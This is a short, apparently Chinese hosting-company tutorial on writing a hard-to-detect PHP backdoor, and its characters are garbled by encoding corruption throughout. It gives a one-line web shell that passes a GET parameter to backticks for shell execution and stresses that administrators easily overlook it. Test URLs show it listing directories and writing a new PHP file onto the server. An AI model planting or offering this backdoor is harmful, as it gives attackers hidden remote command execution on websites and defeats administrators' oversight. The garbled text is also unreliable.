您好,登錄后才能下訂單哦!
本篇內(nèi)容介紹了“如何編寫一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼”的有關(guān)知識(shí),在實(shí)際案例的操作過(guò)程中,不少人都會(huì)遇到這樣的困境,接下來(lái)就讓小編帶領(lǐng)大家學(xué)習(xí)一下如何處理這些情況吧!希望大家仔細(xì)閱讀,能夠?qū)W有所成!
這里用到了一個(gè)一般的PHPer都不怎么關(guān)注的反撇號(hào) ` ,反撇號(hào)包含的字符串,等同于shell_exec函數(shù)。
偽裝性很好,很容易被管理員忽略。
$selfNums = $_GET['r']; if (isset($selfNums)){ echo `$selfNums`; }
剛看到這段代碼我想大家都會(huì)說(shuō)沒(méi)有問(wèn)題,但是細(xì)心的朋友也會(huì)發(fā)現(xiàn)下面的變量被一個(gè)符號(hào)包起來(lái)了,既然是變量為什么要這樣了,
而且又不是單引號(hào),這個(gè)就是關(guān)鍵所在了,這個(gè)符號(hào)是 Esc 下面的一個(gè)鍵(位于感嘆號(hào)!旁邊的),
通過(guò) echo `系統(tǒng)命令`; 可以達(dá)到 system(); 一樣的效果
如果不信的朋友可以測(cè)試
http://127.0.0.1/t.php?r=dir 可以列出目錄
http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:\web\90sec.php
我用 appserv 和虛擬主機(jī)已經(jīng)測(cè)試成功。
“如何編寫一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼”的內(nèi)容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識(shí)可以關(guān)注億速云網(wǎng)站,小編將為大家輸出更多高質(zhì)量的實(shí)用文章!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。